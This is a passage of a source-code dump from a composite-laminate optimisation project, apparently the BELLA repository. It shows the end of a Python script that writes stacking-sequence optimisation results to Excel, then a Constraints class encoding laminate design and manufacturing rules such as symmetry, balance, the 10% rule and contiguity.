approx'] = np.NaN\r\n# table_result.loc[i, 'diff A22 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff A12 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff A66 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff A16 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff A26 percentage - approx'] = np.NaN\r\n#\r\n# table_result.loc[i, 'diff D11 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D22 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D12 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D66 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D16 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D26 percentage - approx'] = np.NaN\r\n else:\r\n\r\n print('Time', elapsed1)\r\n print('objective with modified lamination parameter weightings',\r\n result.objective)\r\n\r\n # Laminate ply count\r\n table_result.loc[i, 'Ply count'] = n_plies_lam\r\n\r\n # number of the outer loop with the best results\r\n table_result.loc[i, 'best outer loop'] \\\r\n = result.n_outer_step_best_solution\r\n\r\n # Computational time in s\r\n table_result.loc[i, 'time (s)'] = elapsed1\r\n\r\n# # Number of objective function evaluations\r\n# table_result.loc[i, 'Number of objective function evaluations'] \\\r\n# = \" \".join(result.n_obj_func_calls_tab.astype(str))\r\n\r\n # Number of iterations\r\n table_result.loc[i, 'n_outer_step_performed'] \\\r\n = result.number_of_outer_steps_performed\r\n\r\n # objective\r\n table_result.loc[\r\n i, 
'objective with initial lamination parameter weightings'] \\\r\n = objectives(\r\n lampam=result.lampam,\r\n targets=targets,\r\n lampam_weightings=parameters.lampam_weightings_ini,\r\n constraints=constraints,\r\n parameters=parameters)\r\n\r\n table_result.loc[\r\n i, 'objective with modified lamination parameter weightings'] \\\r\n = result.objective\r\n\r\n # Inhomogeneity factor\r\n table_result.loc[i, 'target inhomogeneity factor'] \\\r\n = np.linalg.norm(lampam_target[0:4] - lampam_target[8:12])\r\n\r\n # objectives\r\n for k in range(parameters.n_outer_step):\r\n table_result.loc[\r\n i, f'objective iteration {k+1}'] = result.obj_tab[k]\r\n\r\n # lampam_target - lampamRetrieved\r\n table_result.loc[i, 'error1 = abs(lampam_target[1]-lampam[1])'] \\\r\n = abs(lampam_target[0] - result.lampam[0])\r\n table_result.loc[i, 'error2'] = abs(\r\n lampam_target[1] - result.lampam[1])\r\n table_result.loc[i, 'error3'] = abs(\r\n lampam_target[2]- result.lampam[2])\r\n table_result.loc[i, 'error4'] = abs(\r\n lampam_target[3]- result.lampam[3])\r\n table_result.loc[i, 'error5'] = abs(\r\n lampam_target[4]- result.lampam[4])\r\n table_result.loc[i, 'error6'] = abs(\r\n lampam_target[5]- result.lampam[5])\r\n table_result.loc[i, 'error7'] = abs(\r\n lampam_target[6]- result.lampam[6])\r\n table_result.loc[i, 'error8'] = abs(\r\n lampam_target[7]- result.lampam[7])\r\n table_result.loc[i, 'error9'] = abs(\r\n lampam_target[8]- result.lampam[8])\r\n table_result.loc[i, 'error10'] = abs(\r\n lampam_target[9]- result.lampam[9])\r\n table_result.loc[i, 'error11'] = abs(\r\n lampam_target[10]- result.lampam[10])\r\n table_result.loc[i, 'error12'] = abs(\r\n lampam_target[11]- result.lampam[11])\r\n\r\n # lampam_target\r\n table_result.loc[i, 'lampam_target[1]'] = lampam_target[0]\r\n table_result.loc[i, 'lampam_target[2]'] = lampam_target[1]\r\n table_result.loc[i, 'lampam_target[3]'] = lampam_target[2]\r\n table_result.loc[i, 'lampam_target[4]'] = lampam_target[3]\r\n table_result.loc[i, 'lampam_target[5]'] = lampam_target[4]\r\n table_result.loc[i, 'lampam_target[6]'] = lampam_target[5]\r\n table_result.loc[i, 'lampam_target[7]'] = lampam_target[6]\r\n table_result.loc[i, 'lampam_target[8]'] = lampam_target[7]\r\n table_result.loc[i, 'lampam_target[9]'] = lampam_target[8]\r\n table_result.loc[i, 'lampam_target[10]'] = lampam_target[9]\r\n table_result.loc[i, 'lampam_target[11]'] = lampam_target[10]\r\n table_result.loc[i, 'lampam_target[12]'] = lampam_target[11]\r\n\r\n # Retrieved stacking sequence at step 1\r\n ss_flatten = np.array(result.ss_tab[0], dtype=str)\r\n ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[i, 'ss retrieved at step 1'] = ss_flatten\r\n\r\n # Retrieved stacking sequence\r\n ss_flatten = np.array(result.ss, dtype=str)\r\n ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[i, 'ss retrieved'] = ss_flatten\r\n\r\n # Target stacking sequence\r\n ss_flatten = np.array(ss_target, dtype=str)\r\n #ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[i, 'ss target'] = ss_flatten\r\n\r\n # Ply counts\r\n table_result.loc[i, 'N0_target'] = N0_Target\r\n table_result.loc[i, 'N90_target'] = N90_Target\r\n table_result.loc[i, 'N45_target'] = N45_Target\r\n table_result.loc[i, 'N-45_target'] = N135_Target\r\n N0 = sum(result.ss == 0)\r\n N90 = sum(result.ss == 90)\r\n N45 = sum(result.ss == 45)\r\n N135 = sum(result.ss == -45)\r\n table_result.loc[i, 'N0 - N0_target'] = N0 - N0_Target\r\n table_result.loc[i, 'N90 - N90_target'] = N90 - N90_Target\r\n table_result.loc[i, 'N45 - 
N45_target'] = N45 - N45_Target\r\n table_result.loc[i, 'N-45 - N-45_target'] = N135 - N135_Target\r\n table_result.loc[i, 'penalty value for the 10% rule'] \\\r\n = calc_penalty_10_ss(result.ss, constraints)\r\n\r\n for ind in range(n_outer_step):\r\n # numbers of stacks at the last level of the last group search\r\n table_result.loc[i, 'n_designs_last_level ' + str(ind + 1)] \\\r\n = result.n_designs_last_level_tab[ind]\r\n # numbers of repaired stacks at the last group search\r\n table_result.loc[i, 'n_designs_repaired ' + str(ind + 1)] \\\r\n = result.n_designs_repaired_tab[ind]\r\n # numbers of unique repaired stacks at the last group search\r\n table_result.loc[i, 'n_designs_repaired_unique ' + str(ind + 1)] \\\r\n = result.n_designs_repaired_unique_tab[ind]\r\n\r\n # in-plane orthotropy\r\n ipo_now = ipo_param_1_12(result.lampam, mat_prop, constraints.sym)\r\n table_result.loc[i, 'In-plane orthotropy parameter 1'] = ipo_now[0]\r\n table_result.loc[i, 'In-plane orthotropy parameter 2'] = ipo_now[1]\r\n table_result.loc[i, 'In-plane orthotropy parameter 3'] = ipo_now[2]\r\n table_result.loc[i, 'In-plane orthotropy parameter 4'] = ipo_now[3]\r\n table_result.loc[i, 'In-plane orthotropy parameter 5'] = ipo_now[4]\r\n table_result.loc[i, 'In-plane orthotropy parameter 6'] = ipo_now[5]\r\n table_result.loc[i, 'In-plane orthotropy parameter 7'] = ipo_now[6]\r\n table_result.loc[i, 'In-plane orthotropy parameter 8'] = ipo_now[7]\r\n table_result.loc[i, 'In-plane orthotropy parameter 9'] = ipo_now[8]\r\n table_result.loc[i, 'In-plane orthotropy parameter 10'] = ipo_now[9]\r\n table_result.loc[i, 'In-plane orthotropy parameter 11'] = ipo_now[10]\r\n table_result.loc[i, 'In-plane orthotropy parameter 12'] = ipo_now[11]\r\n\r\n A = A_from_lampam(result.lampam, mat_prop)\r\n A11 = A[0, 0]\r\n A22 = A[1, 1]\r\n A12 = A[0, 1]\r\n A66 = A[2, 2]\r\n A16 = A[0, 2]\r\n A26 = A[1, 2]\r\n\r\n B = B_from_lampam(result.lampam, mat_prop)\r\n B11 = B[0, 0]\r\n B22 = B[1, 1]\r\n B12 = B[0, 1]\r\n B66 = B[2, 2]\r\n B16 = B[0, 2]\r\n B26 = B[1, 2]\r\n\r\n D = D_from_lampam(result.lampam, mat_prop)\r\n D11 = D[0, 0]\r\n D22 = D[1, 1]\r\n D12 = D[0, 1]\r\n D66 = D[2, 2]\r\n D16 = D[0, 2]\r\n D26 = D[1, 2]\r\n\r\n# print('A16', A16, A16_target, abs((A16 - A16_target)/A16_target))\r\n# print('A26', A26, A26_target, abs((A26 - A26_target)/A26_target))\r\n#\r\n# print('D16', D16, D16_target, abs((D16 - D16_target)/D16_target))\r\n# print('D26', D26, D26_target, abs((D26 - D26_target)/D26_target))\r\n\r\n table_result.loc[i, 'diff A11 percentage'] \\\r\n = abs((A11 - A11_target)/A11_target)\r\n table_result.loc[i, 'diff A22 percentage'] \\\r\n = abs((A22 - A22_target)/A22_target)\r\n\r\n if abs(A12_target/A11_target) > 1e-8:\r\n table_result.loc[i, 'diff A12 percentage'] \\\r\n = abs((A12 - A12_target)/A12_target)\r\n else:\r\n table_result.loc[i, 'diff A12 percentage'] = np.NaN\r\n if abs(A66_target/A11_target) > 1e-8:\r\n table_result.loc[i, 'diff A66 percentage'] \\\r\n = abs((A66 - A66_target)/A66_target)\r\n else:\r\n table_result.loc[i, 'diff A66 percentage'] = np.NaN\r\n if abs(A16_target/A11_target) > 1e-8:\r\n table_result.loc[i, 'diff A16 percentage'] \\\r\n = abs((A16 - A16_target)/A16_target)\r\n else:\r\n table_result.loc[i, 'diff A16 percentage'] = np.NaN\r\n if abs(A26_target/A11_target) > 1e-8:\r\n table_result.loc[i, 'diff A26 percentage'] \\\r\n = abs((A26 - A26_target)/A26_target)\r\n else:\r\n table_result.loc[i, 'diff A26 percentage'] = np.NaN\r\n\r\n if B11_target:\r\n table_result.loc[i, 'diff 
B11 percentage'] \\\r\n = abs((B11 - B11_target)/B11_target)\r\n else:\r\n table_result.loc[i, 'diff B11 percentage'] = np.NaN\r\n if B22_target:\r\n table_result.loc[i, 'diff B22 percentage'] \\\r\n = abs((B22 - B22_target)/B22_target)\r\n else:\r\n table_result.loc[i, 'diff B22 percentage'] = np.NaN\r\n if B12_target:\r\n table_result.loc[i, 'diff B12 percentage'] \\\r\n = abs((B12 - B12_target)/B12_target)\r\n else:\r\n table_result.loc[i, 'diff B12 percentage'] = np.NaN\r\n if B66_target:\r\n table_result.loc[i, 'diff B66 percentage'] \\\r\n = abs((B66 - B66_target)/B66_target)\r\n else:\r\n table_result.loc[i, 'diff B66 percentage'] = np.NaN\r\n if B16_target:\r\n table_result.loc[i, 'diff B16 percentage'] \\\r\n = abs((B16 - B16_target)/B16_target)\r\n else:\r\n table_result.loc[i, 'diff B16 percentage'] = np.NaN\r\n if B26_target:\r\n table_result.loc[i, 'diff B26 percentage'] \\\r\n = abs((B26 - B26_target)/B26_target)\r\n else:\r\n table_result.loc[i, 'diff B26 percentage'] = np.NaN\r\n\r\n table_result.loc[i, 'diff D11 percentage'] \\\r\n = abs((D11 - D11_target)/D11_target)\r\n table_result.loc[i, 'diff D22 percentage'] \\\r\n = abs((D22 - D22_target)/D22_target)\r\n if abs(D12_target/D11_target) > 1e-8:\r\n table_result.loc[i, 'diff D12 percentage'] \\\r\n = abs((D12 - D12_target)/D12_target)\r\n else:\r\n table_result.loc[i, 'diff D12 percentage'] = np.NaN\r\n if abs(D66_target/D11_target) > 1e-8:\r\n table_result.loc[i, 'diff D66 percentage'] \\\r\n = abs((D66 - D66_target)/D66_target)\r\n else:\r\n table_result.loc[i, 'diff D66 percentage'] = np.NaN\r\n if abs(D16_target/D11_target) > 1e-8:\r\n table_result.loc[i, 'diff D16 percentage'] \\\r\n = abs((D16 - D16_target)/D16_target)\r\n else:\r\n table_result.loc[i, 'diff D16 percentage'] = np.NaN\r\n if abs(D26_target/D11_target) > 1e-8:\r\n table_result.loc[i, 'diff D26 percentage'] \\\r\n = abs((D26 - D26_target)/D26_target)\r\n else:\r\n table_result.loc[i, 'diff D26 percentage'] = np.NaN\r\n\r\n\r\n\r\n# table_result.loc[i, 'diff A11 percentage - approx'] \\\r\n# = abs(4*(lampam_target[0] - result.lampam[0]) \\\r\n# + (lampam_target[1] - result.lampam[1])) \\\r\n# / abs(3 + 4*lampam_target[0] + lampam_target[1])\r\n# table_result.loc[i, 'diff A22 percentage - approx'] \\\r\n# = abs(4*(lampam_target[0] - result.lampam[0]) \\\r\n# - (lampam_target[1] - result.lampam[1])) \\\r\n# / abs(3 - 4*lampam_target[0] + lampam_target[1])\r\n# print(lampam_target[0], lampam_target[1])\r\n# if abs(A12_target/A11_target) > 1e-8:\r\n# table_result.loc[i, 'diff A12 percentage - approx'] \\\r\n# = abs((lampam_target[1] - result.lampam[1])) \\\r\n# / abs(1 - lampam_target[1])\r\n# else:\r\n# table_result.loc[i, 'diff A12 percentage - approx'] = np.NaN\r\n# if abs(A66_target/A11_target) > 1e-8:\r\n# table_result.loc[i, 'diff A66 percentage - approx'] \\\r\n# = abs((lampam_target[1] - result.lampam[1])) \\\r\n# / abs(4 - lampam_target[1])\r\n# else:\r\n# table_result.loc[i, 'diff A66 percentage - approx'] = np.NaN\r\n# if abs(A16_target/A11_target) > 1e-8:\r\n# table_result.loc[i, 'diff A16 percentage - approx'] \\\r\n# = abs(2*(lampam_target[2] - result.lampam[2]) \\\r\n# + (lampam_target[3] - result.lampam[3])) \\\r\n# / abs(2*lampam_target[2] + lampam_target[3])\r\n# else:\r\n# table_result.loc[i, 'diff A16 percentage - approx'] = np.NaN\r\n# if abs(A26_target/A11_target) > 1e-8:\r\n# table_result.loc[i, 'diff A26 percentage - approx'] \\\r\n# = abs(2*(lampam_target[2] - result.lampam[2]) \\\r\n# - (lampam_target[3] - result.lampam[3])) 
\\\r\n# / abs(2*lampam_target[2] - lampam_target[3])\r\n# else:\r\n# table_result.loc[i, 'diff A26 percentage - approx'] = np.NaN\r\n#\r\n#\r\n#\r\n# table_result.loc[i, 'diff D11 percentage - approx'] \\\r\n# = abs(4*(lampam_target[8] - result.lampam[8]) \\\r\n# + (lampam_target[9] - result.lampam[9])) \\\r\n# / abs(3 + 4*lampam_target[8] + lampam_target[9])\r\n# table_result.loc[i, 'diff D22 percentage - approx'] \\\r\n# = abs(4*(lampam_target[8] - result.lampam[8]) \\\r\n# - (lampam_target[9] - result.lampam[9])) \\\r\n# / abs(3 - 4*lampam_target[8] + lampam_target[9])\r\n# if abs(D12_target/D11_target) > 1e-8:\r\n# table_result.loc[i, 'diff D12 percentage - approx'] \\\r\n# = abs((lampam_target[9] - result.lampam[9])) \\\r\n# / abs(1 - lampam_target[9])\r\n# else:\r\n# table_result.loc[i, 'diff D12 percentage - approx'] = np.NaN\r\n# if abs(D66_target/D11_target) > 1e-8:\r\n# table_result.loc[i, 'diff D66 percentage - approx'] \\\r\n# = abs((lampam_target[9] - result.lampam[9])) \\\r\n# / abs(4 - lampam_target[9])\r\n# else:\r\n# table_result.loc[i, 'diff D66 percentage - approx'] = np.NaN\r\n# if abs(D16_target/D11_target) > 1e-8:\r\n# table_result.loc[i, 'diff D16 percentage - approx'] \\\r\n# = abs(2*(lampam_target[10] - result.lampam[10]) \\\r\n# + (lampam_target[11] - result.lampam[11])) \\\r\n# / abs(2*lampam_target[10] + lampam_target[11])\r\n# else:\r\n# table_result.loc[i, 'diff D16 percentage - approx'] = np.NaN\r\n# if abs(D26_target/D11_target) > 1e-8:\r\n# table_result.loc[i, 'diff D26 percentage - approx'] \\\r\n# = abs(2*(lampam_target[10] - result.lampam[10]) \\\r\n# - (lampam_target[11] - result.lampam[11])) \\\r\n# / abs(2*lampam_target[10] - lampam_target[11])\r\n# else:\r\n# table_result.loc[i, 'diff D26 percentage - approx'] = np.NaN\r\n\r\n\r\n### Write results in a excell sheet\r\nwriter = pd.ExcelWriter(result_filename)\r\ntable_result.to_excel(writer, 'results')\r\nwriter.save()\r\nsave_constraints_LAYLA(result_filename, constraints)\r\nsave_parameters_LAYLA_V02(result_filename, parameters)\r\nsave_materials(result_filename, mat_prop)\r\nautofit_column_widths(result_filename)\r\n"
},
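The script above copies the twelve 'lampam[i]' columns of each row into lampam_target one assignment at a time; the same read can be sketched more compactly as below. The column names follow the script, but the file name here is only a placeholder:

```python
import numpy as np
import pandas as pd

data = pd.read_excel('pop_sym_C0_40plies.xlsx', sheet_name='stacks')  # placeholder file
row = data.loc[0]
lampam_target = np.array([row[f'lampam[{j}]'] for j in range(1, 13)], float)
n_plies_lam = int(row['ply_counts'])
print(n_plies_lam, lampam_target)
```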
{
"alpha_fraction": 0.5440820455551147,
"alphanum_fraction": 0.5852829217910767,
"avg_line_length": 40.5343132019043,
"blob_id": "f9bd65bb82b1e76359a3b39459cb00484c371121",
"content_id": "105967850ba3dcca5b2e21d5e7984c88456452bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17354,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 408,
"path": "/src/BELLA/constraints.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for design and manufacturing constraints\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\n\r\nimport numpy as np\r\n\r\nclass Constraints():\r\n \"A class for storing a set of design & manufacturing constraints\"\r\n\r\n\r\n def __init__(\r\n self,\r\n sym=False,\r\n bal=False,\r\n oopo=False,\r\n dam_tol=False,\r\n rule_10_percent=False,\r\n rule_10_Abdalla=False,\r\n percent_Abdalla=0,\r\n combine_45_135=True,\r\n calc_combine_45_135=True,\r\n percent_0=0,\r\n percent_45=0,\r\n percent_90=0,\r\n percent_135=0,\r\n percent_45_135=0,\r\n diso=False,\r\n contig=False,\r\n n_contig=1,\r\n delta_angle=45,\r\n dam_tol_rule=2,\r\n set_of_angles=np.array([0, 45, 90, -45]),\r\n min_drop=1,\r\n pdl_spacing=False,\r\n covering=False,\r\n n_covering=0):\r\n \" creates a set of constraints\"\r\n\r\n # Symmetry\r\n self.sym = sym\r\n if not isinstance(sym, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, sym must be a boolean!\"\"\")\r\n\r\n # Damage tolerance\r\n self.dam_tol = dam_tol\r\n if not isinstance(dam_tol, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, dam_tol must be a boolean!\"\"\")\r\n # which damage tolerance rule?\r\n if dam_tol:\r\n if dam_tol_rule not in [1, 2, 3]:\r\n raise ConstraintDefinitionError(\"\"\"\r\nChoose either:\r\n - damage tolerance rule 1: one outer ply at + or -45 deg at the laminate\r\n surfaces (2 plies in total)\r\n - damage tolerance rule 2: two [+45, -45] or [-45, +45] at the laminate\r\n surfaces (4 plies in total)\r\n - damage tolerance rule 3: [+45,-45] [-45,+45] [+45,+45] or [-45,-45] at\r\n the laminate surfaces (4 plies in total)\"\"\")\r\n self.dam_tol_rule = dam_tol_rule\r\n else:\r\n self.dam_tol_rule = 0\r\n\r\n # Covering guideline\r\n # covering: the outermost plies should not be dropped\r\n # n_covering: number of outer plies on each laminate surface that\r\n # should not be dropped\r\n if not isinstance(covering, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, covering must be a boolean!\"\"\")\r\n if n_covering not in [0, 1, 2]:\r\n raise ConstraintDefinitionError(\"\"\"\r\nChoose either n_covering = 0, 1 or 2\"\"\")\r\n # The damage tolerance rule activates the covering rule\r\n if dam_tol:\r\n covering = True\r\n if dam_tol_rule == 1:\r\n n_covering = max(n_covering, 1)\r\n else:\r\n n_covering = 2\r\n self.covering = covering\r\n if covering:\r\n n_covering = max(n_covering, 1)\r\n self.n_covering = n_covering\r\n\r\n # 10% rule\r\n self.rule_10_percent = rule_10_percent\r\n if not isinstance(rule_10_percent, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, rule_10_percent must be a boolean!\"\"\")\r\n # restrictions of LPs (otherwise restrictions of ply percentages in the\r\n # 0/+-45/90 deg directions)\r\n self.rule_10_Abdalla = rule_10_Abdalla\r\n if not isinstance(rule_10_Abdalla, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, rule_10_Abdalla must be a boolean!\"\"\")\r\n # set the limit percentages for the 10% rule\r\n self.set_percentages(\r\n percent_0, percent_45, percent_90, percent_135, percent_45_135,\r\n percent_Abdalla, combine_45_135, calc_combine_45_135)\r\n\r\n # Disorientation rule: the change of angles between two consecutive\r\n # plies should not exceed delta_angle\r\n self.diso = diso\r\n if not isinstance(diso, bool):\r\n raise ConstraintDefinitionError(\"\"\"\r\nAttention, diso must be a boolean!\"\"\")\r\n if diso:\r\n self.delta_angle = delta_angle\r\n else:\r\n 
self.delta_angle = 180\r\n\r\n        # Contiguity rule: no more than 'n_contig' plies with the same fibre\r\n        # orientation should be next to each other\r\n        self.contig = contig\r\n        if not isinstance(contig, bool):\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, contig must be a boolean!\"\"\")\r\n        if not contig:\r\n            self.n_contig = 1\r\n            self.n_contig_c = 1e10\r\n        else:\r\n            self.n_contig = n_contig\r\n            self.n_contig_c = n_contig\r\n            if n_contig == 1:\r\n                raise ConstraintDefinitionError(\"\"\"\r\nNot allowing two adjacent plies to have the same fibre orientation is too\r\nrestrictive!\r\n\"\"\")\r\n\r\n        # Set the fibre orientations\r\n        self.set_fibre_orientations(set_of_angles, rule_10_percent)\r\n\r\n        # pdl_spacing activates the ply drop spacing rule\r\n        if not isinstance(pdl_spacing, bool):\r\n            raise ConstraintDefinitionError(f\"\"\"\r\nAttention, pdl_spacing {pdl_spacing} must be a boolean!\"\"\")\r\n        self.pdl_spacing = pdl_spacing\r\n\r\n\r\n        # Minimum number of continuous plies required between two\r\n        # blocks of dropped plies\r\n        if not isinstance(min_drop, int):\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, the minimum number of plies between two blocks of dropped plies\r\nmust be an integer!\"\"\")\r\n        if min_drop < 1:\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, the minimum number of plies between two blocks of dropped plies\r\nmust be greater than 0!\"\"\")\r\n        self.min_drop = min_drop\r\n\r\n        # balance and orthotropy requirements\r\n        if not isinstance(oopo, bool):\r\n            raise ConstraintDefinitionError(f\"\"\"\r\nAttention, out-of-plane orthotropy requirements {oopo} must be a boolean!\"\"\")\r\n        if not isinstance(bal, bool):\r\n            raise ConstraintDefinitionError(f\"\"\"\r\nAttention, the balance requirement {bal} must be a boolean!\"\"\")\r\n        self.oopo = oopo # Out-of-plane orthotropy requirement\r\n        self.bal = bal # Balance requirements\r\n        self.ipo = self.bal # Balance requirements (to use RELAY)\r\n\r\n    def set_percentages(\r\n            self, percent_0, percent_45, percent_90, percent_135, percent_45_135,\r\n            percent_Abdalla, combine_45_135, calc_combine_45_135):\r\n        'sets the percentages for the 10% rule'\r\n\r\n        # determine if 10% rule applied on +-45 plies simultaneously or not\r\n        if calc_combine_45_135:\r\n            if percent_45 > 1e-15 + percent_45_135 / 2 \\\r\n            or percent_135 > 1e-15 + percent_45_135 / 2:\r\n                combine_45_135 = False\r\n            else:\r\n                combine_45_135 = True\r\n\r\n        # Minimum percentage for 10% rule of Abdalla (restrictions of LPs)\r\n        self.percent_Abdalla = percent_Abdalla\r\n        # Minimum percentage of 0deg plies\r\n        self.percent_0 = percent_0\r\n        # Minimum percentage of 90deg plies\r\n        self.percent_90 = percent_90\r\n        if combine_45_135:\r\n            # Minimum percentage of +-45deg plies\r\n            self.percent_45_135 = percent_45_135\r\n            # Minimum percentage of 45deg plies\r\n            self.percent_45 = 0\r\n            # Minimum percentage of -45deg plies\r\n            self.percent_135 = 0\r\n        else:\r\n            # Minimum percentage of +-45deg plies\r\n            self.percent_45_135 = 0\r\n            # Minimum percentage of 45deg plies\r\n            self.percent_45 = percent_45\r\n            # Minimum percentage of -45deg plies\r\n            self.percent_135 = percent_135\r\n\r\n        if not isinstance(percent_Abdalla, (float, int)):\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_Abdalla must be a number (float or integer)!\"\"\")\r\n        if percent_Abdalla < 0 or percent_Abdalla > 24.9999999:\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_Abdalla is a percentage and must be between 0 and 25!\"\"\")\r\n        if not isinstance(percent_0, (float, int)):\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_0 must be a number (float or integer)!\"\"\")\r\n        if percent_0 < 0 or percent_0 > 100:\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_0 is a percentage and must be between 0 and 100!\"\"\")\r\n        if not isinstance(percent_45, (float, int)):\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_45 must be a number (float or integer)!\"\"\")\r\n        if percent_45 < 0 or percent_45 > 100:\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_45 is a percentage and must be between 0 and 100!\"\"\")\r\n        if not isinstance(percent_90, (float, int)):\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_90 must be a number (float or integer)!\"\"\")\r\n        if percent_90 < 0 or percent_90 > 100:\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_90 is a percentage and must be between 0 and 100!\"\"\")\r\n        if not isinstance(percent_135, (float, int)):\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_135 must be a number (float or integer)!\"\"\")\r\n        if percent_135 < 0 or percent_135 > 100:\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_135 is a percentage and must be between 0 and 100!\"\"\")\r\n        if not isinstance(percent_45_135, (float, int)):\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_45_135 must be a number (float or integer)!\"\"\")\r\n        if percent_45_135 < 0 or percent_45_135 > 100:\r\n            raise ConstraintDefinitionError(\"\"\"\r\nAttention, percent_45_135 is a percentage and must be between 0 and 100!\"\"\")\r\n        if percent_0 + percent_45 + percent_90 + percent_135 > 100 \\\r\n        or percent_0 + percent_90 + percent_45_135 > 100:\r\n            print(\"\"\"\r\nTotal percentage for the plies in the directions 0/+-45/90 greater than 100!\r\n\"\"\")\r\n        if self.rule_10_percent:\r\n            if self.rule_10_Abdalla:\r\n                self.percent_Abdalla = self.percent_Abdalla/100\r\n                self.percent_0 = 0\r\n                self.percent_45 = 0\r\n                self.percent_90 = 0\r\n                self.percent_135 = 0\r\n                self.percent_45_135 = 0\r\n                self.percent_tot = 0\r\n            else:\r\n                self.percent_Abdalla = 0\r\n                self.percent_0 = self.percent_0/100\r\n                self.percent_45 = self.percent_45/100\r\n                self.percent_90 = self.percent_90/100\r\n                self.percent_135 = self.percent_135/100\r\n                self.percent_45_135 = self.percent_45_135/100\r\n                self.percent_tot = max(\r\n                    self.percent_0 + self.percent_45 \\\r\n                    + self.percent_90 + self.percent_135,\r\n                    self.percent_0 + self.percent_45_135 + self.percent_90)\r\n        else:\r\n            self.percent_Abdalla = 0\r\n            self.percent_0 = 0\r\n            self.percent_45 = 0\r\n            self.percent_90 = 0\r\n            self.percent_135 = 0\r\n            self.percent_45_135 = 0\r\n            self.percent_tot = 0\r\n\r\n    def set_fibre_orientations(self, set_of_angles, rule_10_percent):\r\n        'sets the allowed fibre orientations'\r\n        # Allowed fibre orientations\r\n        self.set_of_angles = np.unique(set_of_angles)\r\n        if (self.set_of_angles > 90).any() \\\r\n        or (self.set_of_angles <= -90).any():\r\n            raise Exception(r\"\"\"\r\nThe allowed fibre angles must be between -90 (excluded) and 90 degrees\r\n(included).\"\"\")\r\n        sett = set(self.set_of_angles)\r\n        if (0 not in sett or 45 not in sett or 90 not in sett \\\r\n            or -45 not in sett) and rule_10_percent:\r\n            raise Exception(r\"\"\"\r\nThe 10% rule is only applicable if the fibre orientations 0, +45, 90, -45\r\nare allowed.\"\"\")\r\n        # useful data for the 10% rule application\r\n        if 0 in sett:\r\n            # index of the 0deg fibre direction in set_of_angles\r\n            self.index0 = np.where(self.set_of_angles == 0)[0][0]\r\n        if 45 in sett:\r\n            # index of the 45deg fibre direction in set_of_angles\r\n            self.index45 = np.where(self.set_of_angles == 45)[0][0]\r\n        if 90 in sett:\r\n            # index of the 90deg fibre direction in set_of_angles\r\n            self.index90 = np.where(self.set_of_angles == 90)[0][0]\r\n        if -45 in sett:\r\n            # index of the -45deg fibre direction in set_of_angles\r\n            self.index135 = np.where(self.set_of_angles == -45)[0][0]\r\n\r\n        # useful data for counting plies in each fibre direction\r\n        angles_dict = dict() # Dictionary to retrieve angles\r\n        ind_angles_dict = dict() # Dictionary to retrieve indices\r\n        for index, angle in enumerate(self.set_of_angles):\r\n            angles_dict[index] = angle\r\n            ind_angles_dict[angle] = index\r\n        if 90 in sett:\r\n            ind_angles_dict[-90] = ind_angles_dict[90]\r\n        self.angles_dict = angles_dict\r\n        self.ind_angles_dict = ind_angles_dict\r\n\r\n        # useful data for positive angles only\r\n        pos_angles = np.unique(np.abs(self.set_of_angles))\r\n        indices_pos_angles_dict = dict() # Dictionary to retrieve indices\r\n        for index, angle in enumerate(pos_angles):\r\n#            pos_angles_dict[index] = angle\r\n            indices_pos_angles_dict[angle] = index\r\n        self.pos_angles = pos_angles\r\n        self.indices_pos_angles_dict = indices_pos_angles_dict\r\n\r\n        # check that angled plies all have their balanced counterpart\r\n        for angle in self.set_of_angles:\r\n            if angle != 90 and -angle not in self.set_of_angles:\r\n                raise Exception(f\"\"\"\r\nMissing input fibre orientation {-angle} to have both angle plies +-{angle}.\r\n\"\"\")\r\n        # Identification of the panels which are not balanced by counting the\r\n        # difference of ply counts for the angled plies.\r\n        angles_bal = self.set_of_angles[[\r\n            index for index in range(self.set_of_angles.size) \\\r\n            if self.set_of_angles[index] > 0 \\\r\n            and self.set_of_angles[index] < 90]]\r\n        # angles_bal: each row has three values:\r\n        #     - fibre orientation of angle ply theta\r\n        #     - index of +theta in constraints.set_of_angles\r\n        #     - index of -theta in constraints.set_of_angles\r\n        self.angles_bal = np.array([[\r\n            elem,\r\n            self.ind_angles_dict[elem],\r\n            self.ind_angles_dict[-elem]\r\n            ] for elem in angles_bal])\r\n\r\n        # data used for repair for balance\r\n        self.indices_bal = dict() # Dictionary to retrieve 